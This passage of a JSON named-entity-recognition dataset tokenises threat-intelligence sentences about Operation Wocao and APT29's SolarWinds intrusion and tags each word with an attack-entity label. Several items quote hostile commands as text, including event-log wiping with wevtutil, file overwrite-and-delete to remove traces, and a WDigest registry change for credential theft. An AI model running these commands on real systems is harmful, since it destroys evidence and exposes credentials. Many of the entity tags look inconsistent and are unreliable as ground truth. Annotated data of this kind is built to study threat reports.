{ + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "archived", + "collected", + "files", + "with", + "WinRAR,", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors'", + "proxy", + "implementation", + "\"Agent\"", + "upgraded", + "the", + "socket", + "in", + "use", + "to", + "a", + "TLS", + "socket." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "a", + "script", + "to", + "collect", + "information", + "about", + "the", + "infected", + "system." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "the", + "threat", + "actors", + "deleted", + "all", + "Windows", + "system", + "and", + "security", + "event", + "logs", + "using", + "`/Q", + "/c", + "wevtutil", + "cl", + "system`", + "and", + "`/Q", + "/c", + "wevtutil", + "cl", + "security`." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "collected", + "clipboard", + "data", + "in", + "plaintext." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "executed", + "PowerShell", + "commands", + "which", + "were", + "encoded", + "or", + "compressed", + "using", + "Base64,", + "zlib,", + "and", + "XOR." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "Mimikatz's", + "DCSync", + "to", + "dump", + "credentials", + "from", + "the", + "memory", + "of", + "the", + "targeted", + "system." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "encrypted", + "IP", + "addresses", + "used", + "for", + "\"Agent\"", + "proxy", + "hops", + "with", + "RC4." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "exfiltrated", + "files", + "and", + "directories", + "of", + "interest", + "from", + "the", + "targeted", + "system." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "PowerShell", + "to", + "add", + "and", + "delete", + "rules", + "in", + "the", + "Windows", + "firewall." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "the", + "`net`", + "command", + "to", + "retrieve", + "information", + "about", + "domain", + "accounts." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "domain", + "credentials,", + "including", + "domain", + "admin,", + "for", + "lateral", + "movement", + "and", + "privilege", + "escalation." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "B-HackOrg", + "O", + "I-Way", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Wocao,", + "the", + "threat", + "actors", + "registered", + "email", + "accounts", + "to", + "use", + "during", + "the", + "campaign." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "the", + "XServer", + "backdoor", + "to", + "exfiltrate", + "data." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-SamFile", + "B-Purp" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "gained", + "initial", + "access", + "by", + "exploiting", + "vulnerabilities", + "in", + "JBoss", + "webservers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "stolen", + "credentials", + "to", + "connect", + "to", + "the", + "victim's", + "network", + "via", + "VPN." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "the", + "threat", + "actors", + "consistently", + "removed", + "traces", + "of", + "their", + "activity", + "by", + "first", + "overwriting", + "a", + "file", + "using", + "`/c", + "cd", + "/d", + "c:\\windows\\temp\\", + "&", + "copy", + "\\\\<IP", + "ADDRESS>\\c$\\windows\\system32\\devmgr.dll", + "\\\\<IP", + "ADDRESS>\\c$\\windows\\temp\\LMAKSW.ps1", + "/y`", + "and", + "then", + "deleting", + "the", + "overwritten", + "file", + "using", + "`/c", + "cd", + "/d", + "c:\\windows\\temp\\", + "&", + "del", + "\\\\<IP", + "ADDRESS>\\c$\\windows\\temp\\LMAKSW.ps1`." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "gathered", + "a", + "recursive", + "directory", + "listing", + "to", + "find", + "files", + "and", + "directories", + "of", + "interest." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "targeted", + "people", + "based", + "on", + "their", + "organizational", + "roles", + "and", + "privileges." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "edited", + "variable", + "names", + "within", + "the", + "Impacket", + "suite", + "to", + "avoid", + "automated", + "detection." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "downloaded", + "additional", + "files", + "to", + "the", + "infected", + "system." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "B-Way", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "proxied", + "traffic", + "through", + "multiple", + "infected", + "systems." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "a", + "Visual", + "Basic", + "script", + "that", + "checked", + "for", + "internet", + "connectivity." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "PowerSploit's", + "`Invoke-Kerberoast`", + "module", + "to", + "request", + "encrypted", + "service", + "tickets", + "and", + "bruteforce", + "the", + "passwords", + "of", + "Windows", + "service", + "accounts", + "offline." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "obtained", + "the", + "password", + "for", + "the", + "victim's", + "password", + "manager", + "via", + "a", + "custom", + "keylogger." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "ProcDump", + "to", + "dump", + "credentials", + "from", + "memory." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "SMB", + "to", + "copy", + "files", + "to", + "and", + "from", + "target", + "systems." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "local", + "account", + "credentials", + "found", + "during", + "the", + "intrusion", + "for", + "lateral", + "movement", + "and", + "privilege", + "escalation." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "staged", + "archived", + "files", + "in", + "a", + "temporary", + "directory", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "the", + "command", + "`net", + "localgroup", + "administrators`", + "to", + "list", + "all", + "administrators", + "part", + "of", + "a", + "local", + "group." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "developed", + "their", + "own", + "custom", + "webshells", + "to", + "upload", + "to", + "compromised", + "servers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "the", + "threat", + "actors", + "renamed", + "some", + "tools", + "and", + "executables", + "to", + "appear", + "as", + "legitimate", + "programs." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "the", + "threat", + "actors", + "enabled", + "Wdigest", + "by", + "changing", + "the", + "`HKLM\\SYSTEM\\\\ControlSet001\\\\Control\\\\SecurityProviders\\\\WDigest`", + "registry", + "value", + "from", + "0", + "(disabled)", + "to", + "1", + "(enabled)." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "a", + "custom", + "collection", + "method", + "to", + "intercept", + "two-factor", + "authentication", + "soft", + "tokens." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "executed", + "commands", + "through", + "the", + "installed", + "web", + "shell", + "via", + "Tor", + "exit", + "nodes." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "the", + "`CreateProcessA`", + "and", + "`ShellExecute`", + "API", + "functions", + "to", + "launch", + "commands", + "after", + "being", + "injected", + "into", + "a", + "selected", + "process." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "scanned", + "for", + "open", + "ports", + "and", + "used", + "nbtscan", + "to", + "find", + "NETBIOS", + "nameservers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "discovered", + "network", + "disks", + "mounted", + "to", + "the", + "system", + "using", + "netstat." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "a", + "custom", + "protocol", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "the", + "threat", + "actors", + "used", + "uncommon", + "high", + "ports", + "for", + "its", + "backdoor", + "C2,", + "including", + "ports", + "25667", + "and", + "47000." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "accessed", + "and", + "collected", + "credentials", + "from", + "password", + "managers." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "discovered", + "removable", + "disks", + "attached", + "to", + "a", + "system." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "PowerShell", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "Mimikatz", + "to", + "dump", + "certificates", + "and", + "private", + "keys", + "from", + "the", + "Windows", + "certificate", + "store." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "the", + "threat", + "actors", + "used", + "`tasklist`", + "to", + "collect", + "a", + "list", + "of", + "running", + "processes", + "on", + "an", + "infected", + "system." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "injected", + "code", + "into", + "a", + "selected", + "process,", + "which", + "in", + "turn", + "launches", + "a", + "command", + "as", + "a", + "child", + "process", + "of", + "the", + "original." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "a", + "custom", + "proxy", + "tool", + "called", + "\"Agent\"", + "which", + "has", + "support", + "for", + "multiple", + "hops." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors'", + "backdoors", + "were", + "written", + "in", + "Python", + "and", + "compiled", + "with", + "py2exe." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "the", + "threat", + "actors", + "executed", + "`/c", + "cd", + "/d", + "c:\\windows\\temp\\", + "&", + "reg", + "query", + "HKEY_CURRENT_USER\\Software\\<username>\\PuTTY\\Sessions\\`", + "to", + "detect", + "recent", + "PuTTY", + "sessions,", + "likely", + "to", + "further", + "lateral", + "movement." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "`nbtscan`", + "and", + "`ping`", + "to", + "discover", + "remote", + "systems,", + "as", + "well", + "as", + "`dsquery", + "subnet`", + "on", + "a", + "domain", + "controller", + "to", + "retrieve", + "all", + "subnets", + "in", + "the", + "Active", + "Directory." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "Impacket's", + "smbexec.py", + "as", + "well", + "as", + "accessing", + "the", + "C$", + "and", + "IPC$", + "shares", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "scheduled", + "tasks", + "to", + "execute", + "malicious", + "PowerShell", + "code", + "on", + "remote", + "systems." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "scripts", + "to", + "detect", + "security", + "software." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Wocao,", + "the", + "threat", + "actors", + "purchased", + "servers", + "with", + "Bitcoin", + "to", + "use", + "during", + "the", + "operation." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "created", + "services", + "on", + "remote", + "systems", + "for", + "execution", + "purposes." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "collected", + "a", + "list", + "of", + "installed", + "software", + "on", + "the", + "infected", + "system." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "discovered", + "the", + "local", + "disks", + "attached", + "to", + "the", + "system", + "and", + "their", + "hardware", + "information", + "including", + "manufacturer", + "and", + "model,", + "as", + "well", + "as", + "the", + "OS", + "versions", + "of", + "systems", + "connected", + "to", + "a", + "targeted", + "network." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "discovered", + "the", + "local", + "network", + "configuration", + "with", + "`ipconfig`." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "collected", + "a", + "list", + "of", + "open", + "connections", + "on", + "the", + "infected", + "system", + "using", + "`netstat`", + "and", + "checks", + "whether", + "it", + "has", + "an", + "internet", + "connection." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "enumerated", + "sessions", + "and", + "users", + "on", + "a", + "remote", + "host,", + "and", + "identified", + "privileged", + "users", + "logged", + "into", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "the", + "`tasklist`", + "command", + "to", + "search", + "for", + "one", + "of", + "its", + "backdoors." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "the", + "`time`", + "command", + "to", + "retrieve", + "the", + "current", + "time", + "of", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Operation", + "Wocao,", + "the", + "threat", + "actors", + "obtained", + "a", + "variety", + "of", + "open", + "source", + "tools,", + "including", + "JexBoss,", + "KeeThief,", + "and", + "BloodHound." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "valid", + "VPN", + "credentials", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "VBScript", + "to", + "conduct", + "reconnaissance", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors’", + "XServer", + "tool", + "communicated", + "using", + "HTTP", + "and", + "HTTPS." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "used", + "their", + "own", + "web", + "shells,", + "as", + "well", + "as", + "those", + "previously", + "placed", + "on", + "target", + "systems", + "by", + "other", + "threat", + "actors,", + "for", + "reconnaissance", + "and", + "lateral", + "movement." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "spawned", + "a", + "new", + "`cmd.exe`", + "process", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Operation", + "Wocao,", + "threat", + "actors", + "has", + "used", + "WMI", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "O", + "I-OffAct", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "obtained", + "a", + "list", + "of", + "users", + "and", + "their", + "roles", + "from", + "an", + "Exchange", + "server", + "using", + "`Get-ManagementRoleAssignment`." + ], + "ner_tags": [ + "O", + "O", + "B-Exp", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "added", + "credentials", + "to", + "OAuth", + "Applications", + "and", + "Service", + "Principals." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "granted", + "`company", + "administrator`", + "privileges", + "to", + "a", + "newly", + "created", + "service", + "principle." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "added", + "their", + "own", + "devices", + "as", + "allowed", + "IDs", + "for", + "active", + "sync", + "using", + "`Set-CASMailbox`,", + "allowing", + "it", + "to", + "obtain", + "copies", + "of", + "victim", + "mailboxes.", + "It", + "also", + "added", + "additional", + "permissions", + "(such", + "as", + "Mail.Read", + "and", + "Mail.ReadWrite)", + "to", + "compromised", + "Application", + "or", + "Service", + "Principals." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "compromised", + "service", + "principals", + "to", + "make", + "changes", + "to", + "the", + "Office", + "365", + "environment." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + 